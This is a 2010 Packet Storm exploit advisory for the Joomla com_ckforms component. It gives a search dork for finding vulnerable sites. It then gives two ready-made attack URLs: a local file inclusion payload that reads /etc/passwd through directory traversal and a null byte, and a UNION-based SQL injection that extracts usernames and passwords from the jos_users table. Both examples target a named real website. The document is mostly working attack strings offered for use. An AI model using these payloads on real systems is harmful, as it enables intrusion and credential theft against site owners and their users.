Joomla Ckforms Local File Inclusion / SQL Injection

2010-03-17T00:00:00
ID PACKETSTORM:87374
Type packetstorm
Reporter altbta
Modified 2010-03-17T00:00:00

Description

                                        
                                            `  
  
####################################################################  
>>>>> Author : altbta [l_9@hotmail.com<mailto:l_9@hotmail.com>]  
>>>>> Home : www.v4-team.com/cc<http://www.v4-team.com/cc>  
>>>>> Script : Joomla Component com_ckforms  
>>>>> Bug Type : Multiple Vulnerabilities  
>>>>> Dork : inurl:"com_ckforms"  
  
####################################################################  
  
===[ Exploit ]=== [LFI]  
  
http://site/index.php?option=com_ckforms&controller=[LFI]  
http://segelbart.se/hjbk/index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00  
  
===[ Exploit ]=== [sql]  
  
http://site/index.php?option=com_ckforms&controller=ckdata&view=ckformsdata&layout=detail&task=detail&fid=2[sql]  
http://segelbart.se/hjbk/index.php?option=com_ckforms&controller=ckdata&view=ckformsdata&layout=detail&task=detail&fid=  
-2 0UNION 0SELECT 1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from jos_users--  
  
####################################################################  
RxH & ab0-3th4b  
  
  
  
`